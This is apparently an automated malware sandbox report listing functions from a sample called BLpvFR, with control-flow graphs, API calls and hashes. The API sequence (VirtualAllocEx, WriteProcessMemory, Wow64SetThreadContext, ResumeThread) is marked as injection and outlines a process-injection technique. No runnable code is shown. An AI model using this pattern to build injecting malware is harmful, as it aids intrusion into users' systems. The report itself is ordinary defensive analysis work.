                                                              Function 00D044B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 162 d044b4-d059b9 CreateActCtxA 166 d059c2-d05a1c 162->166 167 d059bb-d059c1 162->167 174 d05a2b-d05a2f 166->174 175 d05a1e-d05a21 166->175 167->166 176 d05a40 174->176 177 d05a31-d05a3d 174->177 175->174 179 d05a41 176->179 177->176 179->179
                                                              APIs
                                                              • CreateActCtxA.KERNEL32(?), ref: 00D059A9
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1573193825.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_d00000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: a9833f1afb04beb3d883520b2feb55579602a7c5979a65b92cb0d331d5270a85
                                                              • Instruction ID: af03168ec52409095d3ac6c2be3f44096268889e0e0cbf85a476ca49bf0bea70
                                                              • Opcode Fuzzy Hash: a9833f1afb04beb3d883520b2feb55579602a7c5979a65b92cb0d331d5270a85
                                                              • Instruction Fuzzy Hash: CC41E3B0D00719CFEB24DFA9C844BDEBBB6BF49304F20816AD408AB255DB756945CFA0
                                                              Function 00D058ED Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 180 d058ed-d0596c 182 d0596f-d059b9 CreateActCtxA 180->182 184 d059c2-d05a1c 182->184 185 d059bb-d059c1 182->185 192 d05a2b-d05a2f 184->192 193 d05a1e-d05a21 184->193 185->184 194 d05a40 192->194 195 d05a31-d05a3d 192->195 193->192 197 d05a41 194->197 195->194 197->197
                                                              APIs
                                                              • CreateActCtxA.KERNEL32(?), ref: 00D059A9
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1573193825.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_d00000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: e81fa005755c79536b45333d47ebf450c9ec6914d5496b5eb747172a73a4a711
                                                              • Instruction ID: 6a87d5f535b1a20378c50c9ed787ff71388228ca67749825a09a02d9b31ca115
                                                              • Opcode Fuzzy Hash: e81fa005755c79536b45333d47ebf450c9ec6914d5496b5eb747172a73a4a711
                                                              • Instruction Fuzzy Hash: BA41E370D00719CFEB24DFA9C8447CEBBB5BF49304F24816AD408AB295DB756945CF61
                                                              Function 059527C0 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 198 59527c0-59527e5 call 595211c 201 59527e7-59527f7 call 5951e78 198->201 202 59527fa-595288c CreateIconFromResourceEx 198->202 207 5952895-59528b2 202->207 208 595288e-5952894 202->208 208->207
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1586739897.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_5950000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID: CreateFromIconResource
                                                              • String ID:
                                                              • API String ID: 3668623891-0
                                                              • Opcode ID: d31c8718d0ba286b8b67613d84d74f8cebaf973be8f2ec59220a4a95ca9cfb6b
                                                              • Instruction ID: ab3bb88232f1d7d54e94314f9a30987cc913e31f4e454aef7c5bffcd413846ee
                                                              • Opcode Fuzzy Hash: d31c8718d0ba286b8b67613d84d74f8cebaf973be8f2ec59220a4a95ca9cfb6b
                                                              • Instruction Fuzzy Hash: E1318D76904359DFCB11CFA9C844ADEBFF8EF49320F14805AEA54A7211C339A854DFA1
                                                              Function 06FF6DE0 Relevance: 1.6, APIs: 1, Instructions: 74injectionCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 211 6ff6de0-6ff6e36 214 6ff6e38-6ff6e44 211->214 215 6ff6e46-6ff6e85 WriteProcessMemory 211->215 214->215 217 6ff6e8e-6ff6ebe 215->217 218 6ff6e87-6ff6e8d 215->218 218->217
                                                              APIs
                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06FF6E78
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1587241808.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_6ff0000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: 4eabff9a49cd7773534b522640ff30a01644849806b268281bf40ad2b5300308
                                                              • Instruction ID: e84279093d42e8035695bba7da59e21d712d13861c07fa56d4986dae44a3c141
                                                              • Opcode Fuzzy Hash: 4eabff9a49cd7773534b522640ff30a01644849806b268281bf40ad2b5300308
                                                              • Instruction Fuzzy Hash: D8212476900309DFDB10CFAAC881BDEBBF5FF48310F148429E958A7250CB789945CBA5
                                                              Function 06FF6DE8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 222 6ff6de8-6ff6e36 224 6ff6e38-6ff6e44 222->224 225 6ff6e46-6ff6e85 WriteProcessMemory 222->225 224->225 227 6ff6e8e-6ff6ebe 225->227 228 6ff6e87-6ff6e8d 225->228 228->227
                                                              APIs
                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06FF6E78
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1587241808.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_6ff0000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: 2be45e1b4377796141303b7d4ea3cedb1f72a6f02e51c4728103dc56cc199d16
                                                              • Instruction ID: f852242f86b26468ea7e19e440e6bd586e3233ea9cd28ee7717de85da338153e
                                                              • Opcode Fuzzy Hash: 2be45e1b4377796141303b7d4ea3cedb1f72a6f02e51c4728103dc56cc199d16
                                                              • Instruction Fuzzy Hash: 2D212472900349DFDB10CFAAC885BDEBBF5FF48310F14842AEA58A7250C7789951CBA5
                                                              Function 06FF6ED0 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 243 6ff6ed0-6ff6f65 ReadProcessMemory 247 6ff6f6e-6ff6f9e 243->247 248 6ff6f67-6ff6f6d 243->248 248->247
                                                              APIs
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06FF6F58
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1587241808.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_6ff0000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessRead
                                                              • String ID:
                                                              • API String ID: 1726664587-0
                                                              • Opcode ID: 25c6eb74d411c026550829d9c127749434082406baef08c1a8904dc3db76ccbb
                                                              • Instruction ID: a56dc20533e4b3d31e02d0205f2c33e9a355c7021931e37f109fb6cfc5279823
                                                              • Opcode Fuzzy Hash: 25c6eb74d411c026550829d9c127749434082406baef08c1a8904dc3db76ccbb
                                                              • Instruction Fuzzy Hash: 112125718003499FDB10CFAAC881AEEFBF5FF48310F108429E518A7240DB799915CBA5
                                                              Function 06FF6C49 Relevance: 1.6, APIs: 1, Instructions: 68threadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 232 6ff6c49-6ff6c9b 235 6ff6c9d-6ff6ca9 232->235 236 6ff6cab-6ff6cdb Wow64SetThreadContext 232->236 235->236 238 6ff6cdd-6ff6ce3 236->238 239 6ff6ce4-6ff6d14 236->239 238->239
                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06FF6CCE
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1587241808.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_6ff0000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: 63f461fdafb0bea982bc078da5f8b787a43167eb3d544ccc0bf9368013e2d659
                                                              • Instruction ID: e617ab5ae3fc5ff712a64a824faa11b051285c8870bcaf2f23fc6b080a272b17
                                                              • Opcode Fuzzy Hash: 63f461fdafb0bea982bc078da5f8b787a43167eb3d544ccc0bf9368013e2d659
                                                              • Instruction Fuzzy Hash: 26213871D103099FEB10DFAAC8857EFBBF4EF88214F14842AE559A7240CB789945CFA5
                                                              Function 06FF6ED8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 262 6ff6ed8-6ff6f65 ReadProcessMemory 265 6ff6f6e-6ff6f9e 262->265 266 6ff6f67-6ff6f6d 262->266 266->265
                                                              APIs
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06FF6F58
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1587241808.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_6ff0000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessRead
                                                              • String ID:
                                                              • API String ID: 1726664587-0
                                                              • Opcode ID: 1d79d97493e201d244f688bc6309af21343949cd5504a57e3de735407000d31a
                                                              • Instruction ID: b9cdac3a55e8ff1d46a992753f703d67eef3b86fee0062bd8c94ef67b8b53adc
                                                              • Opcode Fuzzy Hash: 1d79d97493e201d244f688bc6309af21343949cd5504a57e3de735407000d31a
                                                              • Instruction Fuzzy Hash: 772114718003499FDB10CFAAC880BEEFBF5FF48310F14842AE519A7250D7799911CBA5
                                                              Function 06FF6C50 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 252 6ff6c50-6ff6c9b 254 6ff6c9d-6ff6ca9 252->254 255 6ff6cab-6ff6cdb Wow64SetThreadContext 252->255 254->255 257 6ff6cdd-6ff6ce3 255->257 258 6ff6ce4-6ff6d14 255->258 257->258
                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06FF6CCE
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1587241808.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_6ff0000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: 6dc93d3345f039bc503f86dbfacfcd7560f50feae6a5814309b4cad5cbc7e0b6
                                                              • Instruction ID: 7841b322d3b10071fe739e3d43e283f5e0734ed68bf146b9719edecd1cac399a
                                                              • Opcode Fuzzy Hash: 6dc93d3345f039bc503f86dbfacfcd7560f50feae6a5814309b4cad5cbc7e0b6
                                                              • Instruction Fuzzy Hash: E9213571D103098FDB10CFAAC8857AEBBF4EF88214F14842AD559A7240CB789945CFA5
                                                              Function 00D0D59F Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 270 d0d59f-d0d634 DuplicateHandle 271 d0d636-d0d63c 270->271 272 d0d63d-d0d65a 270->272 271->272
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00D0D627
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1573193825.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_d00000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: d78f6795973f40e2b0d3c976b96d0f1d67eba1ed40e81f6d13429d0eba9cb2ae
                                                              • Instruction ID: e2bc634c93227be351a2eee2901632c61798e942f8c5d1a3dfbcd5d3b27a29ed
                                                              • Opcode Fuzzy Hash: d78f6795973f40e2b0d3c976b96d0f1d67eba1ed40e81f6d13429d0eba9cb2ae
                                                              • Instruction Fuzzy Hash: 6721E2B5900248EFDB10CFAAD884ADEFBF5EB48310F14841AE918A7350C379A940CFA5
                                                              Function 00D0D5A0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00D0D627
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1573193825.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_d00000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: ddc1641e325f8d0094acecdfece7a2475fb222712650bca0fb7d5bd327545198
                                                              • Instruction ID: 77724e918e4aef4bd19f27da5231db5183b9feb5f4a15f79ba465e9a029fcea0
                                                              • Opcode Fuzzy Hash: ddc1641e325f8d0094acecdfece7a2475fb222712650bca0fb7d5bd327545198
                                                              • Instruction Fuzzy Hash: 1B21C4B5900348DFDB10CFAAD884ADEFBF9EB48310F14841AE958A7350D379A954CF65
                                                              Function 06FF6D20 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06FF6D96
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1587241808.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_6ff0000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 98a40da92d3315e1619f24fdb35a29a3bdd7f7f26712a10ba8e27f1df4be079e
                                                              • Instruction ID: e740bece6e1a758611feec4b527b6f639841de8afd1e4c9456db952fd647b1df
                                                              • Opcode Fuzzy Hash: 98a40da92d3315e1619f24fdb35a29a3bdd7f7f26712a10ba8e27f1df4be079e
                                                              • Instruction Fuzzy Hash: D41144769003499FDB20DFAAC845BDFBBF5AF48320F248819E559A7250CB75A940CBA1
                                                              Function 0595211C Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,059527DA,?,?,?,?,?), ref: 0595287F
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1586739897.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_5950000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID: CreateFromIconResource
                                                              • String ID:
                                                              • API String ID: 3668623891-0
                                                              • Opcode ID: baed72e989de9640e0230eea6361c710639c328e37cb0e4a654339ce8213bbb9
                                                              • Instruction ID: b6c0b7c359ae30c39cf6c63e3765534906c280f2b5acf23bd809450686e3295a
                                                              • Opcode Fuzzy Hash: baed72e989de9640e0230eea6361c710639c328e37cb0e4a654339ce8213bbb9
                                                              • Instruction Fuzzy Hash: F8113AB5800349DFDB10CF9AC844BDEBFF8EB48320F14841AEA54A7250C379A954CFA5
                                                              Function 06FF6791 Relevance: 1.6, APIs: 1, Instructions: 54threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1587241808.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_6ff0000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: 109f05f087b004474201921af6d1c0bfc78fe441d83cc46e99d258c46d9eda06
                                                              • Instruction ID: a37d80b74c836fa92930ea90fd7164578bd9fcd3ab58b0f4fdccf9eeb7165c72
                                                              • Opcode Fuzzy Hash: 109f05f087b004474201921af6d1c0bfc78fe441d83cc46e99d258c46d9eda06
                                                              • Instruction Fuzzy Hash: DB115871D003488FDB20DFAAD8457DFFBF5EF88214F248829D519A7240CB79A945CBA5
                                                              Function 06FF6D28 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06FF6D96
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1587241808.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_6ff0000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 01924204dd7675a1b368aaf3d37f118d35f1361925ce6f1a1241dc18748cfe05
                                                              • Instruction ID: 35bc6d6323ead1b0511ce09b21ac0477f442e9e3fac6f34a9a01f17b83bb081a
                                                              • Opcode Fuzzy Hash: 01924204dd7675a1b368aaf3d37f118d35f1361925ce6f1a1241dc18748cfe05
                                                              • Instruction Fuzzy Hash: CB1126718003499FDB20DFAAC844BDFBBF5AF48320F248819E519A7250CB75A540CBA5
                                                              Function 06FF6798 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1587241808.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_6ff0000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: bd53c1ce69653d275d82bec4a6d1f29e12d9073f599da941b2f67dd1957fb9b9
                                                              • Instruction ID: d464b30a0a0d6418d6ac1865654d8322a4963c4ee33612c1994409fb19874e4b
                                                              • Opcode Fuzzy Hash: bd53c1ce69653d275d82bec4a6d1f29e12d9073f599da941b2f67dd1957fb9b9
                                                              • Instruction Fuzzy Hash: 53113671D003488FDB20DFAAC84579FFBF5AF88324F248829D519A7250CB79A941CBA5
                                                              Function 06FF9D80 Relevance: 1.5, APIs: 1, Instructions: 49windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 06FF9DE5
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1587241808.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_6ff0000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID: MessagePost
                                                              • String ID:
                                                              • API String ID: 410705778-0
                                                              • Opcode ID: a2a62d108208f4ba861aaabbe66306a98ca9b4192458c09e28d5752026fff892
                                                              • Instruction ID: 02e247f4e2ab1079531dbfca4a2fc18c336fff74f3c021693f87c37dd6b2b278
                                                              • Opcode Fuzzy Hash: a2a62d108208f4ba861aaabbe66306a98ca9b4192458c09e28d5752026fff892
                                                              • Instruction Fuzzy Hash: 8B11F5B5800349DFDB20CF9AD885BDEFBF8EB48314F208419E598A7610C375A584CFA5
                                                              Function 00D0B2C0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 00D0B326
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1573193825.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_d00000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: 93f9c5aa72fc3bd6f1d5b663cc6aa474b1157cd3a8a9b43a0b57c53ba043740d
                                                              • Instruction ID: d102451983ecbdf46fb0adb120ad8b33b33b032840cf357a091bf0762c537e29
                                                              • Opcode Fuzzy Hash: 93f9c5aa72fc3bd6f1d5b663cc6aa474b1157cd3a8a9b43a0b57c53ba043740d
                                                              • Instruction Fuzzy Hash: 8811FDB58007498BDB20CF9AD444B9EFBF4AB88320F24842AD468A7250C379A545CFA5
                                                              Function 00D0B2BF Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 00D0B326
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1573193825.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_d00000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: fdc5e6c53d1e5648b1642c3fd59a7a5b790d324bfb6869e851b0d34bc2d379b6
                                                              • Instruction ID: 6f5ebfb77db7067a2c0d6b18f361aad31ec0a0ac0bb82731f54d04c568984cfe
                                                              • Opcode Fuzzy Hash: fdc5e6c53d1e5648b1642c3fd59a7a5b790d324bfb6869e851b0d34bc2d379b6
                                                              • Instruction Fuzzy Hash: C911FDB58007498BDB20CF9AD444BDEFBF4AB88320F24842AD468A7250C379A545CFA1
                                                              Function 06FF693C Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 06FF9DE5
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1587241808.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_6ff0000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID: MessagePost
                                                              • String ID:
                                                              • API String ID: 410705778-0
                                                              • Opcode ID: fd79f7647772801ff366cf44c39ccf5ac093f904929e4fba72478ed3f6b8541a
                                                              • Instruction ID: 2b640bef971ba26d7f7f4a9b21f69f015379771dcdb39a30246eab1eb348cbea
                                                              • Opcode Fuzzy Hash: fd79f7647772801ff366cf44c39ccf5ac093f904929e4fba72478ed3f6b8541a
                                                              • Instruction Fuzzy Hash: D811F5B5800749DFDB20DF9AC885BDEFBF8EB48314F208419E558A7211C3B5A944CFA5
                                                              Function 00A8D4C4 Relevance: .1, Instructions: 75COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1571542480.0000000000A8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A8D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_a8d000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6b461e5e7855a6acdcafa19234fef427c079ee641f6a30aeeed26d5f6e79eda6
                                                              • Instruction ID: d73a580a98a7b9826f1bd56d592c484334af64c2e5ba076e4ab860aa7691a1de
                                                              • Opcode Fuzzy Hash: 6b461e5e7855a6acdcafa19234fef427c079ee641f6a30aeeed26d5f6e79eda6
                                                              • Instruction Fuzzy Hash: F521F871504244EFDB19EF14D9C0F26BF65FB84718F24C56AE8050B296C336D856CBA2
                                                              Function 00A9D01C Relevance: .1, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1571693767.0000000000A9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A9D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_a9d000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 64d4a16761288b974e06c6a7cf9cbd3ba1b86bfb8ef26077e1eb9a8efad2db68
                                                              • Instruction ID: 065385d1385313d3d8f63f837347531b99e2cb1ce87f46c24f82847df1587388
                                                              • Opcode Fuzzy Hash: 64d4a16761288b974e06c6a7cf9cbd3ba1b86bfb8ef26077e1eb9a8efad2db68
                                                              • Instruction Fuzzy Hash: C921F271604344EFDF14DF24D984B26BBA5FB84314F24C569E84A4B286C33AD887CA62
                                                              Function 00A9D006 Relevance: .1, Instructions: 60COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1571693767.0000000000A9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A9D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_a9d000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 21acb93e24e15a95e07091f200764ee86239bc43e4c5c452174949b9e00a6e59
                                                              • Instruction ID: 7856a85382edfb58e0e4793ae879487915e891e17b46d7d90805c60b6ab588b4
                                                              • Opcode Fuzzy Hash: 21acb93e24e15a95e07091f200764ee86239bc43e4c5c452174949b9e00a6e59
                                                              • Instruction Fuzzy Hash: 052192755093809FDB02CF20D990715BFB1EB45314F28C5DAD8498B697C33AD84ACB62
                                                              Function 00A8D4BF Relevance: .1, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1571542480.0000000000A8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A8D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_a8d000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0d1964494f132f00775c0e221f472ab769a33717f3edcd57285c8181465a4d2f
                                                              • Instruction ID: 0bfc69befcd88e22f78f3f0abef288c3fd9a57212a1020de09018358a6ea584b
                                                              • Opcode Fuzzy Hash: 0d1964494f132f00775c0e221f472ab769a33717f3edcd57285c8181465a4d2f
                                                              • Instruction Fuzzy Hash: 7A11E676504280DFCB15DF10D9C4B16BF71FB94318F24C6AAD8490F656C336D856CBA2
                                                              Function 00A8D731 Relevance: .0, Instructions: 45COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1571542480.0000000000A8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A8D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_a8d000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b19e9629ae2a45af91cb4feebdfdae2294816b10c19ee78c4e2481a8da91d1b7
                                                              • Instruction ID: 1f826ebc0f332a32a1c3bdbb7e79f021f449ebf31ee72232a2cab766fd469f02
                                                              • Opcode Fuzzy Hash: b19e9629ae2a45af91cb4feebdfdae2294816b10c19ee78c4e2481a8da91d1b7
                                                              • Instruction Fuzzy Hash: 4F01A271404744ABEB106B65DD84B66FBE8EF81724F28C46AED095E2C2C6789840CBB2
                                                              Function 00A8D730 Relevance: .0, Instructions: 36COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1571542480.0000000000A8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A8D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_a8d000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 20913c63533fd7cc3b815d75e6fc72fa0d07d3661a37acc58fd89365af311677
                                                              • Instruction ID: bd92f08043a10b74de2904f5946bd995048f7cca17ddfab785d35d3a51ed2b77
